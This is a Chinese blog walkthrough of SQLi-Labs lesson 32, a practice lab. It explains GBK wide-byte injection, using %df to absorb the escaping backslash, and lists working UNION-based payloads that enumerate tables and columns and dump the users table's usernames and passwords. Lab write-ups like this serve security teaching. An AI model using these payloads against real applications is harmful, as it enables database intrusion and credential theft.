SQL-labs的第32关——union联合查询攻击 宽字节注入(Get)

最新推荐文章于 2024-08-05 01:42:08 发布
最新推荐文章于 2024-08-05 01:42:08 发布
阅读量365 收藏 2
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/132194577
版权

绕过向危险字符添加斜杠的自定义筛选器

注意只要出现危险字符就会自动添加斜杆。这里的危险字符只有单引号,所以只要写了单引号,就要干扰斜杠。

1、判断闭合方式

输入语句

?id=1\

,返回页面如下:

按理来说,它这次是无法正常返回内容的,但是它正常返回了,并且又了一个\。

我们再输入

?id=1'

,返回页面如下:

我们再输入

?id=111'

,返回页面如下:

我们这次发现无论输入什么数字,都会在数值的后面加上一个\。其实应该说是在其他符号的前面加上\。比如:输入

?id='1'

,返回页面如下:

在单引号的后面加上了\。

我们确定这一次应当使用宽字节注入。

2、干扰反斜杠

输入语句

?id=1%df'

,返回页面如下:

我们发现出现了报错,这是因为反斜杠的编码是%5c,而在GBK编码中,%df%5c繁体字“连”,这样的话\就无法阻碍单引号了,即单引号成功逃逸。此时单引号成功发挥作用。但由于该网站的闭合方式也是单引号所以出现了报错。

3、判断闭合方式

我们再输入

?id=1%df\

 尝试闭合,返回页面如下:

这说明该网站的闭合方式是单引号。

4、选择注入方式

我们发现该网站既会出现报错信息,又有回显位,所以该关既可以使用union联合查询攻击,也可以使用报错注入。

我们这次选择union联合查询攻击。

5、寻找回显点

输入语句

?id=1%df' order by 3--+

,返回页面如下:

由此可以确定,一共有3个返回点 。我们现在看看这三个返回点中有几个回显点。

输入语句,返回页面如下:

所以第2和3个返回点是回显点。

6、查询数据库名、用户名、版本

输入语句

?id=0%df' union select 11,database(),concat(user(),version())--+

,返回页面如下:

7、查询数据表名

输入语句

?id=0%df' union select 11,group_concat(table_name),12 from information_schema.tables where table_schema=database()--+

,返回页面如下:

8、查询字段名

输入语句

?id=1%df' union select 11,group_concat(column_name),12 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

,返回页面如下:

这里的0x7573657273是'users'的Hex编码。

9、查询字段内容

输入语句

?id=0%df' union select 11,group_concat(concat(id,0x7e,username,0x7e,password) ),12 from users --+

,返回页面如下:

到此打靶结束

sql-labs闯32~37
qq_44663230的博客
09-04 2144
sql-labs闯32~37 宽字节注入集合
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 718
继续学习sqli-labs,本篇是less 32-37
sqli-labs第32
最新发布
weixin_46023655的博客
08-05 463
宽字节注入
sqli-labs(32)
weixin_30402085的博客
05-31 435
0x1查看源代码 (1)代码键点  很明显,代码中利用正则匹配将 [/,'," ]这些三个符号都过滤掉了  preg_replace 0x2 宽字符注入 (1)前言   在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的...
sqli-labs进阶篇 32~38
Lucky小小吴的小屋
02-06 1009
本文章主要讲述sqli-labs靶场第32到38的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
SQLi-Labs 第32
rp114514的博客
07-03 237
注入单引号闭合时被反斜杠转义,查看源码发现简单过滤。通过检查编码设置,尝试利用宽字节绕过。原理是利用数据库和页面编码不同:PHP请求MySQL时经过GBK编码,并进行魔术引号处理。由于GBK是双字节编码,提交的%df字符和反斜杠组成新汉字,数据库按GBK处理后,单引号逃逸。实训课上我们进行了SQLi-Labs 第32的挑战,在这一中,我们将面对一个通过反斜杠转义来防御SQL注入的系统。具体来说,通过宽字节注入技术,利用数据库和页面编码不同的特点,我们可以成功逃逸出被转义的单引号,从而进行SQL注入。
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1877
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1767
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs(1-30) 个人思路分享——SQL注入
CC__Faker的博客
06-20 1271
下载地址:https://github.com/Audi-1/sqli-labs 目录Page-1(Basic Challenges)less-1less-2less-3less-4less-5less-6less-7Page-2 (Advanced Injections)Page-3 (Stacked Injections)Page-4 (Challenges) Page-1(Basic Challenges) less-1 0x01 利用cc'key--+引起语句报错,发现报错中cc正常执行,于是猜测是
sqli-labs:less-32宽字节注入
羽的博客
10-19 3123
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
sqli32宽字节注入
dirich的博客
06-13 430
宽字节顾名思义就是两个及以上的字节表示一个中文汉字。在sql注入中,当用户输入中包含特殊字符,比如(单引号’),(双引号"),(斜杠/)等,为了过滤用户输入的这些特殊字符,会在字符前面加一个\转义字符对特殊字符进行转义。而大多数网站使用utf-8编码,utf-8编码会认为一个中文字符占三个字节;而后端mysql常用GBK编码,GBK编码认为一个中文占两个字节。所以针对这个原理,我们可以构造中文汉字来绕过字符转义。
sqli-labs (less-32)
kukudeshuo的博客
03-13 2159
sqli-labs (less-32) 进入32,输入 http://127.0.0.1/sql1/Less-32/?id=1 http://127.0.0.1/sql1/Less-32/?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,
SQLlib-第32宽字节注入
千寻的博客
02-22 1381
文章目录宽字节注入第一节 构造绕过代码第二节注入原理第三节代码审计第四节注入实操判断字段个数判断显示位置判断数据库版本何当前数据库数据库中的表名表中字段字段内容免责声明 宽字节注入 宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。 为了说明宽字节注入问题,我们以SQLi-labs 32 为例子。 第一节 构造绕过代码 [http://192.168.139.136/sqli-lab...
SQL-Labs靶场“32-33”教程
钟言的博客
03-14 5793
本篇为SQL-Labs靶场的第32到33的通教程(宽字节注入),详细内容包含了、32 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
基于Sqli-Labs靶场的SQL注入-32~37
Joker
01-09 1334
这篇博客我主要讲宽字节注入,包括一些转义函数的简单讲解。主要理解宽字节注入的原理即可。
sqli-labs/Less-32
m0_71299382的博客
11-20 333
sqli-labs第三十二
SQL注入详解 32-37
君莫hacker的博客
10-14 1216
Less-32 确定注入类型 查看当前数据库 爆表 爆列 爆数据 Less-33 确定注入类型 查看当前数据库 爆表 爆列 爆数据 Less-34 确定注入类型 查看当前数据库 爆表 爆列 爆数据 Less-35 确定注入类型 查看当前数据库 爆表 爆列 爆数据 Less-36 确定注入类型 查看当前数据库 爆表 爆列 爆数据 ...
SQL注入:sqli-labs 32 宽字节注入
Zeker62的博客
08-12 485
http://127.0.0.1/sqli/Less-32/?id=1不报错 http://127.0.0.1/sqli/Less-32/?id=1'发现下面的信息框里面多了一个转义字符: Hint: The Query String you input is escaped as : 1’ The Query String you input in Hex becomes : 315c27 再尝试:http://127.0.0.1/sqli/Less-32/?id=1"发现仍然被转义。 显然第二行显示信.
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1327
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
sql-labs宽字节注入
07-28
宽字节注入是一种针对某些数据库的特殊注入攻击技术,它利用了某些数据库在处理字符编码转换时的漏洞。而 SQL-Labs 是一个用于学习和测试 SQL 注入漏洞的开源项目。 在宽字节注入中,攻击者通过在输入的数据中插入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值